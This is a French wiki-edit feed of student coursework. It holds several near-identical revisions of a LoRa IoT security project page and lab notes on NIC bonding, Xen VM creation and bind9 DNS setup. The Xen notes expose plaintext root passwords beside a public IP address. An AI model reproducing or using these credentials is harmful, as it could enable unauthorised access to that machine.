&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35038</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35038"/>
				<updated>2016-11-08T10:15:22Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Pile de protocole LoRa */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35037</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35037"/>
				<updated>2016-11-08T10:07:46Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Pile de protocole LoRa */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Lora_phy_layer.PNG&amp;diff=35036</id>
		<title>Fichier:Lora phy layer.PNG</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Lora_phy_layer.PNG&amp;diff=35036"/>
				<updated>2016-11-08T10:00:50Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Couche_lora.PNG&amp;diff=35035</id>
		<title>Fichier:Couche lora.PNG</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Couche_lora.PNG&amp;diff=35035"/>
				<updated>2016-11-08T09:57:35Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34975</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34975"/>
				<updated>2016-11-07T11:00:46Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 $TTL    10800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                              1         ; Serial&lt;br /&gt;
                          10800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.193&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND reverse data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net root.faispastomberlasavo.net (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 10      IN      PTR     ns1.faispastomberlasavo.net.&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns1.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.48&lt;br /&gt;
 Address:	193.48.57.48#53&lt;br /&gt;
 &lt;br /&gt;
 Non-authoritative answer:&lt;br /&gt;
 Name:	faispastomberlasavo.net&lt;br /&gt;
 Address: 217.70.184.38&lt;br /&gt;
&lt;br /&gt;
(ne marche plus depuis un autre pc que la vm???)&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34974</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34974"/>
				<updated>2016-11-07T10:58:24Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
